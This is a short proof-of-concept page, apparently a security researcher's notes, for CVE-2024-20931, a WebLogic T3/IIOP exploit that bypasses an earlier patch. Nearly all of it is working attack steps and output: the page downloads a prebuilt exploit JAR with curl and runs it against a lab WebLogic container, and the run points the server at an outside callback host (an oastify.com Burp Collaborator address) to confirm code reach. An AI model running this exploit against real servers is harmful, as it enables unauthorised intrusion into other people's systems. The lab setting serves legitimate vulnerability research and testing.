WebLogic - CVE-2024-20931

CVE-2024-20931, is built to bypass the patch Oracle made for CVE-2023-21839. In other words, this is just another T3/IIOP exploit of WebLogic.

Project is based on the findings of GlassyAmadeus.

Proof-of-Concept

VulnHub 12.2.1.3

apt :: ~ » docker container ls 
CONTAINER ID   IMAGE                      COMMAND                  CREATED      STATUS             PORTS                                                                                  NAMES
4c1bbd132119   vulhub/weblogic:12.2.1.3   "/u01/oracle/createA…"   2 days ago   Up About an hour   0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp   weblogic-vulnhub-12213
[oracle@weblogic-vulnhub-12213 exp]$ curl -OL https://github.com/0xPThree/WebLogic/raw/refs/heads/main/cve-2024-20931/CVE-2024-20931.jar
[oracle@weblogic-vulnhub-12213 exp]$ java -jar CVE-2024-20931.jar
Please input target IP:127.0.0.1
Please input target port:7001
Please input RMI Address(ip:port/exp):4diumyg78d3drm2y405khl71xs3jraky9.oastify.com
Burp Collaborator callback indicating a successful exploit attempt

Source code

Last updated

Was this helpful?